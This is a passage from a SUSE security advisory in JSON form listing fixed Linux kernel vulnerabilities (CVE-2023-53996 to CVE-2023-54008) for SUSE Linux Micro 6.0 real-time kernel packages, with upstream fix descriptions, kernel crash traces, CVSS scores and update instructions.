},
"references": [
{
"category": "external",
"summary": "CVE-2023-53996",
"url": "https://www.suse.com/security/cve/CVE-2023-53996"
},
{
"category": "external",
"summary": "SUSE Bug 1255618 for CVE-2023-53996",
"url": "https://bugzilla.suse.com/1255618"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53996"
},
{
"cve": "CVE-2023-53997",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53997"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nthermal: of: fix double-free on unregistration\n\nSince commit 3d439b1a2ad3 (\"thermal/core: Alloc-copy-free the thermal\nzone parameters structure\"), thermal_zone_device_register() allocates\na copy of the tzp argument and frees it when unregistering, so\nthermal_of_zone_register() now ends up leaking its original tzp and\ndouble-freeing the tzp copy. Fix this by locating tzp on stack instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53997",
"url": "https://www.suse.com/security/cve/CVE-2023-53997"
},
{
"category": "external",
"summary": "SUSE Bug 1255632 for CVE-2023-53997",
"url": "https://bugzilla.suse.com/1255632"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53997"
},
{
"cve": "CVE-2023-53998",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53998"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwrng: virtio - Fix race on data_avail and actual data\n\nThe virtio rng device kicks off a new entropy request whenever the\ndata available reaches zero. When a new request occurs at the end\nof a read operation, that is, when the result of that request is\nonly needed by the next reader, then there is a race between the\nwriting of the new data and the next reader.\n\nThis is because there is no synchronisation whatsoever between the\nwriter and the reader.\n\nFix this by writing data_avail with smp_store_release and reading\nit with smp_load_acquire when we first enter read. The subsequent\nreads are safe because they\u0027re either protected by the first load\nacquire, or by the completion mechanism.\n\nAlso remove the redundant zeroing of data_idx in random_recv_done\n(data_idx must already be zero at this point) and data_avail in\nrequest_entropy (ditto).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53998",
"url": "https://www.suse.com/security/cve/CVE-2023-53998"
},
{
"category": "external",
"summary": "SUSE Bug 1255578 for CVE-2023-53998",
"url": "https://bugzilla.suse.com/1255578"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53998"
},
{
"cve": "CVE-2023-53999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53999"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: TC, Fix internal port memory leak\n\nThe flow rule can be splited, and the extra post_act rules are added\nto post_act table. It\u0027s possible to trigger memleak when the rule\nforwards packets from internal port and over tunnel, in the case that,\nfor example, CT \u0027new\u0027 state offload is allowed. As int_port object is\nassigned to the flow attribute of post_act rule, and its refcnt is\nincremented by mlx5e_tc_int_port_get(), but mlx5e_tc_int_port_put() is\nnot called, the refcnt is never decremented, then int_port is never\nfreed.\n\nThe kmemleak reports the following error:\nunreferenced object 0xffff888128204b80 (size 64):\n comm \"handler20\", pid 50121, jiffies 4296973009 (age 642.932s)\n hex dump (first 32 bytes):\n 01 00 00 00 19 00 00 00 03 f0 00 00 04 00 00 00 ................\n 98 77 67 41 81 88 ff ff 98 77 67 41 81 88 ff ff .wgA.....wgA....\n backtrace:\n [\u003c00000000e992680d\u003e] kmalloc_trace+0x27/0x120\n [\u003c000000009e945a98\u003e] mlx5e_tc_int_port_get+0x3f3/0xe20 [mlx5_core]\n [\u003c0000000035a537f0\u003e] mlx5e_tc_add_fdb_flow+0x473/0xcf0 [mlx5_core]\n [\u003c0000000070c2cec6\u003e] __mlx5e_add_fdb_flow+0x7cf/0xe90 [mlx5_core]\n [\u003c000000005cc84048\u003e] mlx5e_configure_flower+0xd40/0x4c40 [mlx5_core]\n [\u003c000000004f8a2031\u003e] mlx5e_rep_indr_offload.isra.0+0x10e/0x1c0 [mlx5_core]\n [\u003c000000007df797dc\u003e] mlx5e_rep_indr_setup_tc_cb+0x90/0x130 [mlx5_core]\n [\u003c0000000016c15cc3\u003e] tc_setup_cb_add+0x1cf/0x410\n [\u003c00000000a63305b4\u003e] fl_hw_replace_filter+0x38f/0x670 [cls_flower]\n [\u003c000000008bc9e77c\u003e] fl_change+0x1fd5/0x4430 [cls_flower]\n [\u003c00000000e7f766e4\u003e] tc_new_tfilter+0x867/0x2010\n [\u003c00000000e101c0ef\u003e] rtnetlink_rcv_msg+0x6fc/0x9f0\n [\u003c00000000e1111d44\u003e] netlink_rcv_skb+0x12c/0x360\n [\u003c0000000082dd6c8b\u003e] netlink_unicast+0x438/0x710\n [\u003c00000000fc568f70\u003e] netlink_sendmsg+0x794/0xc50\n [\u003c0000000016e92590\u003e] sock_sendmsg+0xc5/0x190\n\nSo fix this by moving int_port cleanup code to the flow attribute\nfree helper, which is used by all the attribute free cases.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53999",
"url": "https://www.suse.com/security/cve/CVE-2023-53999"
},
{
"category": "external",
"summary": "SUSE Bug 1255621 for CVE-2023-53999",
"url": "https://bugzilla.suse.com/1255621"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53999"
},
{
"cve": "CVE-2023-54000",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54000"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: fix deadlock issue when externel_lb and reset are executed together\n\nWhen externel_lb and reset are executed together, a deadlock may\noccur:\n[ 3147.217009] INFO: task kworker/u321:0:7 blocked for more than 120 seconds.\n[ 3147.230483] \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n[ 3147.238999] task:kworker/u321:0 state:D stack: 0 pid: 7 ppid: 2 flags:0x00000008\n[ 3147.248045] Workqueue: hclge hclge_service_task [hclge]\n[ 3147.253957] Call trace:\n[ 3147.257093] __switch_to+0x7c/0xbc\n[ 3147.261183] __schedule+0x338/0x6f0\n[ 3147.265357] schedule+0x50/0xe0\n[ 3147.269185] schedule_preempt_disabled+0x18/0x24\n[ 3147.274488] __mutex_lock.constprop.0+0x1d4/0x5dc\n[ 3147.279880] __mutex_lock_slowpath+0x1c/0x30\n[ 3147.284839] mutex_lock+0x50/0x60\n[ 3147.288841] rtnl_lock+0x20/0x2c\n[ 3147.292759] hclge_reset_prepare+0x68/0x90 [hclge]\n[ 3147.298239] hclge_reset_subtask+0x88/0xe0 [hclge]\n[ 3147.303718] hclge_reset_service_task+0x84/0x120 [hclge]\n[ 3147.309718] hclge_service_task+0x2c/0x70 [hclge]\n[ 3147.315109] process_one_work+0x1d0/0x490\n[ 3147.319805] worker_thread+0x158/0x3d0\n[ 3147.324240] kthread+0x108/0x13c\n[ 3147.328154] ret_from_fork+0x10/0x18\n\nIn externel_lb process, the hns3 driver call napi_disable()\nfirst, then the reset happen, then the restore process of the\nexternel_lb will fail, and will not call napi_enable(). When\ndoing externel_lb again, napi_disable() will be double call,\ncause a deadlock of rtnl_lock().\n\nThis patch use the HNS3_NIC_STATE_DOWN state to protect the\ncalling of napi_disable() and napi_enable() in externel_lb\nprocess, just as the usage in ndo_stop() and ndo_start().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54000",
"url": "https://www.suse.com/security/cve/CVE-2023-54000"
},
{
"category": "external",
"summary": "SUSE Bug 1255564 for CVE-2023-54000",
"url": "https://bugzilla.suse.com/1255564"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54000"
},
{
"cve": "CVE-2023-54001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: r8712: Fix memory leak in _r8712_init_xmit_priv()\n\nIn the above mentioned routine, memory is allocated in several places.\nIf the first succeeds and a later one fails, the routine will leak memory.\nThis patch fixes commit 2865d42c78a9 (\"staging: r8712u: Add the new driver\nto the mainline kernel\"). A potential memory leak in\nr8712_xmit_resource_alloc() is also addressed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54001",
"url": "https://www.suse.com/security/cve/CVE-2023-54001"
},
{
"category": "external",
"summary": "SUSE Bug 1255628 for CVE-2023-54001",
"url": "https://bugzilla.suse.com/1255628"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54001"
},
{
"cve": "CVE-2023-54005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbinder: fix memory leak in binder_init()\n\nIn binder_init(), the destruction of binder_alloc_shrinker_init() is not\nperformed in the wrong path, which will cause memory leaks. So this commit\nintroduces binder_alloc_shrinker_exit() and calls it in the wrong path to\nfix that.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54005",
"url": "https://www.suse.com/security/cve/CVE-2023-54005"
},
{
"category": "external",
"summary": "SUSE Bug 1255629 for CVE-2023-54005",
"url": "https://bugzilla.suse.com/1255629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54005"
},
{
"cve": "CVE-2023-54006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: Fix data-race around unix_tot_inflight.\n\nunix_tot_inflight is changed under spin_lock(unix_gc_lock), but\nunix_release_sock() reads it locklessly.\n\nLet\u0027s use READ_ONCE() for unix_tot_inflight.\n\nNote that the writer side was marked by commit 9d6d7f1cb67c (\"af_unix:\nannote lockless accesses to unix_tot_inflight \u0026 gc_in_progress\")\n\nBUG: KCSAN: data-race in unix_inflight / unix_release_sock\n\nwrite (marked) to 0xffffffff871852b8 of 4 bytes by task 123 on cpu 1:\n unix_inflight+0x130/0x180 net/unix/scm.c:64\n unix_attach_fds+0x137/0x1b0 net/unix/scm.c:123\n unix_scm_to_skb net/unix/af_unix.c:1832 [inline]\n unix_dgram_sendmsg+0x46a/0x14f0 net/unix/af_unix.c:1955\n sock_sendmsg_nosec net/socket.c:724 [inline]\n sock_sendmsg+0x148/0x160 net/socket.c:747\n ____sys_sendmsg+0x4e4/0x610 net/socket.c:2493\n ___sys_sendmsg+0xc6/0x140 net/socket.c:2547\n __sys_sendmsg+0x94/0x140 net/socket.c:2576\n __do_sys_sendmsg net/socket.c:2585 [inline]\n __se_sys_sendmsg net/socket.c:2583 [inline]\n __x64_sys_sendmsg+0x45/0x50 net/socket.c:2583\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nread to 0xffffffff871852b8 of 4 bytes by task 4891 on cpu 0:\n unix_release_sock+0x608/0x910 net/unix/af_unix.c:671\n unix_release+0x59/0x80 net/unix/af_unix.c:1058\n __sock_release+0x7d/0x170 net/socket.c:653\n sock_close+0x19/0x30 net/socket.c:1385\n __fput+0x179/0x5e0 fs/file_table.c:321\n ____fput+0x15/0x20 fs/file_table.c:349\n task_work_run+0x116/0x1a0 kernel/task_work.c:179\n resume_user_mode_work include/linux/resume_user_mode.h:49 [inline]\n exit_to_user_mode_loop kernel/entry/common.c:171 [inline]\n exit_to_user_mode_prepare+0x174/0x180 kernel/entry/common.c:204\n __syscall_exit_to_user_mode_work kernel/entry/common.c:286 [inline]\n syscall_exit_to_user_mode+0x1a/0x30 kernel/entry/common.c:297\n do_syscall_64+0x4b/0x90 arch/x86/entry/common.c:86\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nvalue changed: 0x00000000 -\u003e 0x00000001\n\nReported by Kernel Concurrency Sanitizer on:\nCPU: 0 PID: 4891 Comm: systemd-coredum Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #5\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54006",
"url": "https://www.suse.com/security/cve/CVE-2023-54006"
},
{
"category": "external",
"summary": "SUSE Bug 1255591 for CVE-2023-54006",
"url": "https://bugzilla.suse.com/1255591"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54006"
},
{
"cve": "CVE-2023-54008",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54008"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio_vdpa: build affinity masks conditionally\n\nWe try to build affinity mask via create_affinity_masks()\nunconditionally which may lead several issues:\n\n- the affinity mask is not used for parent without affinity support\n (only VDUSE support the affinity now)\n- the logic of create_affinity_masks() might not work for devices\n other than block. For example it\u0027s not rare in the networking device\n where the number of queues could exceed the number of CPUs. Such\n case breaks the current affinity logic which is based on\n group_cpus_evenly() who assumes the number of CPUs are not less than\n the number of groups. This can trigger a warning[1]:\n\n\tif (ret \u003e= 0)\n\t\tWARN_ON(nr_present + nr_others \u003c numgrps);\n\nFixing this by only build the affinity masks only when\n\n- Driver passes affinity descriptor, driver like virtio-blk can make\n sure to limit the number of queues when it exceeds the number of CPUs\n- Parent support affinity setting config ops\n\nThis help to avoid the warning. More optimizations could be done on\ntop.\n\n[1]\n[ 682.146655] WARNING: CPU: 6 PID: 1550 at lib/group_cpus.c:400 group_cpus_evenly+0x1aa/0x1c0\n[ 682.146668] CPU: 6 PID: 1550 Comm: vdpa Not tainted 6.5.0-rc5jason+ #79\n[ 682.146671] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014\n[ 682.146673] RIP: 0010:group_cpus_evenly+0x1aa/0x1c0\n[ 682.146676] Code: 4c 89 e0 5b 5d 41 5c 41 5d 41 5e c3 cc cc cc cc e8 1b c4 74 ff 48 89 ef e8 13 ac 98 ff 4c 89 e7 45 31 e4 e8 08 ac 98 ff eb c2 \u003c0f\u003e 0b eb b6 e8 fd 05 c3 00 45 31 e4 eb e5 cc cc cc cc cc cc cc cc\n[ 682.146679] RSP: 0018:ffffc9000215f498 EFLAGS: 00010293\n[ 682.146682] RAX: 000000000001f1e0 RBX: 0000000000000041 RCX: 0000000000000000\n[ 682.146684] RDX: ffff888109922058 RSI: 0000000000000041 RDI: 0000000000000030\n[ 682.146686] RBP: ffff888109922058 R08: ffffc9000215f498 R09: ffffc9000215f4a0\n[ 682.146687] R10: 00000000000198d0 R11: 0000000000000030 R12: ffff888107e02800\n[ 682.146689] R13: 0000000000000030 R14: 0000000000000030 R15: 0000000000000041\n[ 682.146692] FS: 00007fef52315740(0000) GS:ffff888237380000(0000) knlGS:0000000000000000\n[ 682.146695] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 682.146696] CR2: 00007fef52509000 CR3: 0000000110dbc004 CR4: 0000000000370ee0\n[ 682.146698] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 682.146700] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 682.146701] Call Trace:\n[ 682.146703] \u003cTASK\u003e\n[ 682.146705] ? __warn+0x7b/0x130\n[ 682.146709] ? group_cpus_evenly+0x1aa/0x1c0\n[ 682.146712] ? report_bug+0x1c8/0x1e0\n[ 682.146717] ? handle_bug+0x3c/0x70\n[ 682.146721] ? exc_invalid_op+0x14/0x70\n[ 682.146723] ? asm_exc_invalid_op+0x16/0x20\n[ 682.146727] ? group_cpus_evenly+0x1aa/0x1c0\n[ 682.146729] ? group_cpus_evenly+0x15c/0x1c0\n[ 682.146731] create_affinity_masks+0xaf/0x1a0\n[ 682.146735] virtio_vdpa_find_vqs+0x83/0x1d0\n[ 682.146738] ? __pfx_default_calc_sets+0x10/0x10\n[ 682.146742] virtnet_find_vqs+0x1f0/0x370\n[ 682.146747] virtnet_probe+0x501/0xcd0\n[ 682.146749] ? vp_modern_get_status+0x12/0x20\n[ 682.146751] ? get_cap_addr.isra.0+0x10/0xc0\n[ 682.146754] virtio_dev_probe+0x1af/0x260\n[ 682.146759] really_probe+0x1a5/0x410",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54008",
"url": "https://www.suse.com/security/cve/CVE-2023-54008"
},
{
"category": "external",
"summary": "SUSE Bug 1255630 for CVE-2023-54008",
"url": "https://bugzilla.suse.com/1255630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
